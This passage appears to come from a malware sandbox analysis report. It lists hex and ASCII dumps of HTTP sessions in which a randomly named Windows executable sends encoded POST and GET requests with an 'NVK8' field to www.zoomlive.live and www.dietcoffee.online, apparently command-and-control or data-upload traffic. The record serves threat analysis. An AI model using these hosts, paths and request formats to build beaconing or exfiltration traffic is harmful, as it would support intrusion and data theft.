                                                                                Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                                Dec 14, 2024 13:51:27.644674063 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                                Dec 14, 2024 13:51:27.644689083 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                                Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                                Dec 14, 2024 13:51:27.644705057 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                                Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                                                Dec 14, 2024 13:51:27.644721985 CET1236INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                                                Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                                                Dec 14, 2024 13:51:27.644824028 CET1236INData Raw: 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e
                                                                                Data Ascii: p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.
                                                                                Dec 14, 2024 13:51:27.644840956 CET424INData Raw: 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78
                                                                                Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.550028154.208.202.225806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:34.131190062 CET740OUTPOST /k6vm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.zoomlive.live
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.zoomlive.live
                                                                                Referer: http://www.zoomlive.live/k6vm/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 54 72 37 59 64 62 6a 79 79 53 6a 41 67 79 78 61 6d 6b 76 51 64 57 78 44 2b 56 77 6f 50 4c 54 63 75 67 6c 50 30 7a 57 38 32 74 46 73 6a 2b 30 4a 4d 6e 7a 52 56 4c 43 62 38 6d 50 43 4c 48 69 53 7a 66 47 61 76 62 6f 64 69 56 65 79 6c 51 2f 39 41 2f 50 39 52 31 32 56 38 49 77 61 79 43 53 6e 34 39 6a 50 61 4f 30 36 4c 4f 79 53 44 49 72 59 68 6b 77 46 37 72 54 78 4f 63 4f 79 65 43 67 62 6b 2f 42 31 77 38 7a 6b 35 47 5a 44 31 35 71 74 47 4c 39 75 42 38 37 61 44 69 58 46 64 38 66 58 68 4d 53 34 62 4e 6b 78 42 6a 47 64 6a 6d 70 68 54 62 63 67 6c 46 4a 65 4e 53 34 3d
                                                                                Data Ascii: NVK8=NStUcy3QdCnATr7YdbjyySjAgyxamkvQdWxD+VwoPLTcuglP0zW82tFsj+0JMnzRVLCb8mPCLHiSzfGavbodiVeylQ/9A/P9R12V8IwayCSn49jPaO06LOySDIrYhkwF7rTxOcOyeCgbk/B1w8zk5GZD15qtGL9uB87aDiXFd8fXhMS4bNkxBjGdjmphTbcglFJeNS4=
                                                                                Dec 14, 2024 13:51:35.606471062 CET190INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:55:34 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d404 Not Found0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.550029154.208.202.225806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:36.890749931 CET760OUTPOST /k6vm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.zoomlive.live
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.zoomlive.live
                                                                                Referer: http://www.zoomlive.live/k6vm/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 53 49 6a 59 51 63 2f 79 6e 43 6a 48 38 69 78 61 39 30 75 5a 64 57 39 44 2b 52 6f 34 50 2f 2f 63 75 43 39 50 36 53 57 38 31 74 46 73 6f 65 30 4d 52 58 7a 65 56 4c 50 75 38 6a 50 43 4c 48 6d 53 7a 61 36 61 73 73 45 65 6a 46 65 77 74 77 2f 37 45 2f 50 39 52 31 32 56 38 4a 55 30 79 43 61 6e 34 50 33 50 61 74 73 35 55 2b 79 54 4b 6f 72 59 32 55 77 42 37 72 54 44 4f 64 69 55 65 41 49 62 6b 39 5a 31 7a 70 48 6a 77 47 5a 42 37 5a 72 6f 49 65 45 65 48 73 54 50 49 43 69 34 4b 2f 6a 76 6b 36 6a 53 42 76 73 5a 53 44 71 6c 7a 31 68 57 43 72 39 4a 2f 6d 5a 75 54 46 73 2b 41 61 57 74 50 78 4a 4a 4c 36 63 47 35 73 66 70 54 78 65 4d
                                                                                Data Ascii: NVK8=NStUcy3QdCnASIjYQc/ynCjH8ixa90uZdW9D+Ro4P//cuC9P6SW81tFsoe0MRXzeVLPu8jPCLHmSza6assEejFewtw/7E/P9R12V8JU0yCan4P3Pats5U+yTKorY2UwB7rTDOdiUeAIbk9Z1zpHjwGZB7ZroIeEeHsTPICi4K/jvk6jSBvsZSDqlz1hWCr9J/mZuTFs+AaWtPxJJL6cG5sfpTxeM
                                                                                Dec 14, 2024 13:51:38.352535963 CET190INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:55:36 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d404 Not Found0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.550030154.208.202.225806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:39.569766045 CET1777OUTPOST /k6vm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.zoomlive.live
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.zoomlive.live
                                                                                Referer: http://www.zoomlive.live/k6vm/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 53 49 6a 59 51 63 2f 79 6e 43 6a 48 38 69 78 61 39 30 75 5a 64 57 39 44 2b 52 6f 34 50 2b 72 63 76 78 31 50 36 78 2b 38 30 74 46 73 72 65 30 4e 52 58 7a 35 56 4c 58 71 38 6a 79 35 4c 46 4f 53 79 34 43 61 74 59 51 65 6f 46 65 77 76 77 2f 36 41 2f 50 53 52 31 47 5a 38 49 6b 30 79 43 61 6e 34 50 62 50 59 2b 30 35 57 2b 79 53 44 49 72 45 68 6b 78 63 37 72 4c 54 4f 64 6d 69 65 77 6f 62 6c 64 4a 31 31 62 66 6a 78 6d 5a 48 32 35 72 4f 49 65 41 42 48 71 33 44 49 43 6d 47 4b 2f 4c 76 6b 2b 71 58 52 38 41 30 4f 54 4c 47 32 58 56 4c 62 38 52 5a 67 51 5a 70 57 58 77 32 61 72 4f 48 4b 42 74 56 4a 5a 78 65 34 6f 50 75 64 33 37 74 36 57 64 42 64 79 45 65 50 35 6f 68 6e 47 58 31 64 4c 79 2b 6e 5a 67 33 39 34 7a 64 77 73 2b 46 67 56 30 77 56 39 62 69 54 62 51 52 78 32 59 38 44 4d 35 30 4e 4c 52 45 4c 6b 61 35 69 6f 55 63 46 4d 36 6a 6c 35 59 6c 6f 34 4c 6d 49 6f 70 43 6d 71 55 2b 73 4e 52 66 56 71 37 49 64 66 46 33 55 61 49 31 4a 38 43 65 41 6c 42 6e 4b 30 46 61 4a [TRUNCATED]
                                                                                Data Ascii: NVK8=NStUcy3QdCnASIjYQc/ynCjH8ixa90uZdW9D+Ro4P+rcvx1P6x+80tFsre0NRXz5VLXq8jy5LFOSy4CatYQeoFewvw/6A/PSR1GZ8Ik0yCan4PbPY+05W+ySDIrEhkxc7rLTOdmiewobldJ11bfjxmZH25rOIeABHq3DICmGK/Lvk+qXR8A0OTLG2XVLb8RZgQZpWXw2arOHKBtVJZxe4oPud37t6WdBdyEeP5ohnGX1dLy+nZg394zdws+FgV0wV9biTbQRx2Y8DM50NLRELka5ioUcFM6jl5Ylo4LmIopCmqU+sNRfVq7IdfF3UaI1J8CeAlBnK0FaJSqshzUW7zNtqiFaPKeT5Aa8AfbQy0Kbhu0HYJC8ll7c906Tt5QWC0pEtAZ8PkvbBADwKuFJyW0GsIK1aV210qVfQorEFBA48AqOzLoNcdsmAl1lTOd2CNKvdeS5R8Hin3P7uYBkyyw9cDcR8kHl7vO6+27secgJpALDLsIiaCmcAIOQxB7bPUVYlNj9chcZrusRtrmXFVknxvnoHYc0kzOSLgheEaIPl5wCpcOeCz1kaFq1CxNhcsizOrTMTBpNkeYk/cnV0Cby09mr8/Tw6yx/L737DoruaUCfiaXLJp+Tabx7J7AILiXrL8DZST4hEq6B3jDD0/6e42mSBjjeTAAY8wY1zPXEB2owb+1ypo6l3pmyrLkeimf0YL+948lcNTCMKV3gsmUtEDgslf31ZIjktlxq+nq2+pJqbiwzcJDVZ2Mbycm24X0YjUr0PqdPjt90EFzqGfYO2SgmE5DqRT+6jeYF9FG2bO+1b9BGssjrlP25G4s7IUEQNd/Na3nl7KmnTcNp4QoTmTLfxINhoD6aHr8nvBrdIVe5Lga4+z5ImEH7whES3V3OhZYFCTXJpEGi290gHc/dP168atpcbAhMCUjqNeGa/o5v0lJ4ibhEX/NLKE82twJtsKpF6YI+UQqUWTqnkcxrEDF12slJoPnnB6+WwzLCKTy [TRUNCATED]
                                                                                Dec 14, 2024 13:51:41.123873949 CET190INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:55:39 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: d404 Not Found0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.550031154.208.202.225806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:42.245107889 CET482OUTGET /k6vm/?NVK8=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEn81f5kD6IPefKaW6E3aQWqTb4uuDSc/wDXdngD5uc1XtZiQ==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.zoomlive.live
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:51:44.674135923 CET180INHTTP/1.1 503 Service Unavailable
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:55:43 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.55003277.68.64.45806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:50.466197014 CET752OUTPOST /725g/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dietcoffee.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.dietcoffee.online
                                                                                Referer: http://www.dietcoffee.online/725g/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 48 50 41 71 7a 4b 4c 68 43 58 50 42 59 75 67 43 56 62 46 42 42 68 6c 65 32 76 4b 63 38 77 45 57 66 35 62 50 61 76 61 34 71 79 41 4d 57 6f 65 75 73 78 4a 6f 7a 6b 65 78 6d 79 6c 6b 49 4f 43 59 50 32 31 30 6d 56 58 41 6d 30 49 79 6e 39 79 74 71 30 34 55 6c 33 62 6c 2f 37 30 2b 75 79 4f 4b 32 59 4e 7a 4a 31 46 45 6d 77 36 77 32 52 31 79 68 4d 31 62 59 54 68 47 6f 31 52 78 57 71 5a 68 4e 37 56 41 75 57 46 71 74 6b 59 4c 79 6c 68 66 58 72 41 53 5a 52 59 47 36 34 35 42 30 59 48 41 4b 74 62 4a 47 4d 74 64 76 32 53 67 65 59 35 68 73 4a 32 74 54 46 4b 4b 77 71 4d 3d
                                                                                Data Ascii: NVK8=jgo+nmRTntVNHPAqzKLhCXPBYugCVbFBBhle2vKc8wEWf5bPava4qyAMWoeusxJozkexmylkIOCYP210mVXAm0Iyn9ytq04Ul3bl/70+uyOK2YNzJ1FEmw6w2R1yhM1bYThGo1RxWqZhN7VAuWFqtkYLylhfXrASZRYG645B0YHAKtbJGMtdv2SgeY5hsJ2tTFKKwqM=
                                                                                Dec 14, 2024 13:51:51.687136889 CET393INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.25.3
                                                                                Date: Sat, 14 Dec 2024 12:51:51 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.55003377.68.64.45806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:53.316035986 CET772OUTPOST /725g/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dietcoffee.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.dietcoffee.online
                                                                                Referer: http://www.dietcoffee.online/725g/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 56 2f 77 71 32 6f 6a 68 45 33 50 43 58 4f 67 43 62 37 46 46 42 68 70 65 32 75 4f 32 39 46 63 57 52 38 6e 50 62 75 61 34 70 79 41 4d 65 49 65 68 69 52 49 6b 7a 6b 43 44 6d 7a 70 6b 49 4f 47 59 50 33 46 30 6d 6b 58 42 6d 6b 49 30 72 64 79 76 6c 55 34 55 6c 33 62 6c 2f 37 77 45 75 79 57 4b 32 6f 39 7a 49 55 46 48 76 51 36 33 78 52 31 79 71 73 31 58 59 54 67 6a 6f 77 78 66 57 73 64 68 4e 37 6c 41 33 6e 46 74 6e 6b 59 46 2f 46 67 32 62 36 70 67 54 67 59 68 31 72 30 63 69 35 76 31 50 62 71 6a 63 75 6c 31 38 57 2b 59 4f 4c 78 57 39 35 58 45 4a 6d 61 36 75 39 5a 47 50 4f 52 70 6a 6f 6b 6b 43 33 59 59 79 79 42 37 78 67 65 49
                                                                                Data Ascii: NVK8=jgo+nmRTntVNV/wq2ojhE3PCXOgCb7FFBhpe2uO29FcWR8nPbua4pyAMeIehiRIkzkCDmzpkIOGYP3F0mkXBmkI0rdyvlU4Ul3bl/7wEuyWK2o9zIUFHvQ63xR1yqs1XYTgjowxfWsdhN7lA3nFtnkYF/Fg2b6pgTgYh1r0ci5v1Pbqjcul18W+YOLxW95XEJma6u9ZGPORpjokkC3YYyyB7xgeI
                                                                                Dec 14, 2024 13:51:54.365017891 CET393INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.25.3
                                                                                Date: Sat, 14 Dec 2024 12:51:54 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 12 8c 97 a6 07 f9 89 24 88 c4 d4 83 47 4c ab 25 41 8a b4 68 7c 7b 0b 5c 3c ce ce cc 37 4b 57 c9 29 e6 d7 2a 85 03 3f 16 50 5d f6 45 1e 83 b7 46 cc 53 9e 21 26 3c 59 9c d0 0f 10 d3 d2 63 84 2a fb 6c 19 55 b2 16 4e d8 c6 b6 92 45 41 04 a5 b6 90 e9 b1 13 14 97 23 a1 38 87 e8 4d 8b ef d4 db b0 bf 8c 53 84 f6 8c 2b 09 83 7c 8d d2 58 29 e0 72 2e 00 77 e1 f6 81 f0 a9 0d 74 0e 79 9f 90 a0 3b b0 aa 31 60 e4 f0 96 83 4f b1 77 6d 9c c1 6e 65 7a 88 fc 00 4e 5b 37 b5 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: b5M0},$GL%Ah|{\<7KW)*?P]EFS!&<Yc*lUNEA#8MS+|X)r.wty;1`OwmnezN[70


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.55003477.68.64.45806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:56.000159979 CET1789OUTPOST /725g/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dietcoffee.online
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.dietcoffee.online
                                                                                Referer: http://www.dietcoffee.online/725g/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 6a 67 6f 2b 6e 6d 52 54 6e 74 56 4e 56 2f 77 71 32 6f 6a 68 45 33 50 43 58 4f 67 43 62 37 46 46 42 68 70 65 32 75 4f 32 39 46 55 57 52 4f 66 50 64 4e 79 34 6f 79 41 4d 55 6f 65 69 69 52 49 74 7a 6b 4b 48 6d 7a 31 30 49 4e 75 59 50 52 5a 30 67 51 44 42 7a 55 49 30 6a 39 79 73 71 30 35 57 6c 33 4c 70 2f 37 67 45 75 79 57 4b 32 75 35 7a 59 31 46 48 70 51 36 77 32 52 31 75 68 4d 30 49 59 54 34 56 6f 77 46 68 58 63 39 68 4e 66 42 41 73 31 74 74 72 6b 59 48 73 31 67 75 62 36 31 37 54 67 45 36 31 71 77 32 69 36 2f 31 4e 74 62 34 48 66 45 69 67 45 65 68 45 63 70 53 6e 66 6e 38 44 45 61 70 72 75 35 37 49 39 34 47 6f 64 63 6f 48 6c 4e 56 70 6b 30 30 68 45 7a 68 64 71 73 51 49 4f 52 41 53 43 72 78 44 47 48 6d 63 76 33 30 46 4e 4e 52 76 35 45 36 62 56 54 46 49 73 71 72 6c 74 58 77 41 43 59 34 6d 53 58 78 41 71 41 53 7a 34 4f 2f 39 50 44 46 6c 77 2f 66 4c 46 35 50 5a 62 77 79 59 2b 6d 70 6d 65 2b 69 57 42 73 77 71 70 4b 4b 32 46 39 53 63 50 32 62 37 4b 42 4b 35 44 4f 33 41 6d 46 32 71 73 59 51 54 [TRUNCATED]
                                                                                Data Ascii: NVK8=jgo+nmRTntVNV/wq2ojhE3PCXOgCb7FFBhpe2uO29FUWROfPdNy4oyAMUoeiiRItzkKHmz10INuYPRZ0gQDBzUI0j9ysq05Wl3Lp/7gEuyWK2u5zY1FHpQ6w2R1uhM0IYT4VowFhXc9hNfBAs1ttrkYHs1gub617TgE61qw2i6/1Ntb4HfEigEehEcpSnfn8DEapru57I94GodcoHlNVpk00hEzhdqsQIORASCrxDGHmcv30FNNRv5E6bVTFIsqrltXwACY4mSXxAqASz4O/9PDFlw/fLF5PZbwyY+mpme+iWBswqpKK2F9ScP2b7KBK5DO3AmF2qsYQT4vtYmSgSn6DosAcYpwQfzORdMoRL8r5YUgfZV01jlyTLdFce0nbWhrCLVan9MN37tUpFIFKMqSSezc8oaK1fX0gCAZup0ewGlXQEA24C63K4M5qQMuP6Xc/snWId0a1G/Ud94mJ31cicdD4URMGw7Qr5ZKpW3Pd9RNYTHV3I1K0dSis9XxDUT6QYzYFvxh+kRzYpYIBnsZ1UYXViVrLr0iMQ2nvEWSVAHivHJvbLTG34eOiXG4QJv31WxXlaXCcl9mOsuf+AKxn894/xELDjacgPoSeWNKUe02qL/dDDe1ST2KIdsmhUXWQb61O+bBHikHU/75wBvuVFQcF971P89CSisjj/llS4wQYElrF+GU99xu4/ADwDv+6pefE071zzFVZIpu3euA5EpK5JF3PPkfHjGvOaJathVDtKE0lqmaeZTJ17UzXTbHyVh5Dt1OV7NILNIZsW4U4mCs0gcCP8DKlOFkeacPmxLczWud/R5Bd7FDmj2/pIJy19vgYQV/36gsi/m6tgMWvbkZPnz5hjrQzYlDq2dIEyhPEKB8bJrN+7lTt4nNQMn45n9F6t4y3GgBvV+m7zI6o2iA6RBMcEw0/hjZiDsDhxxVmO3OVvUwhF6Qj3DmfvSszhBVWtatuA26iRXuRJYC4guzedSwWpiBoz3OrIG11feo [TRUNCATED]
                                                                                Dec 14, 2024 13:51:57.217530966 CET393INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.25.3
                                                                                Date: Sat, 14 Dec 2024 12:51:57 GMT
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
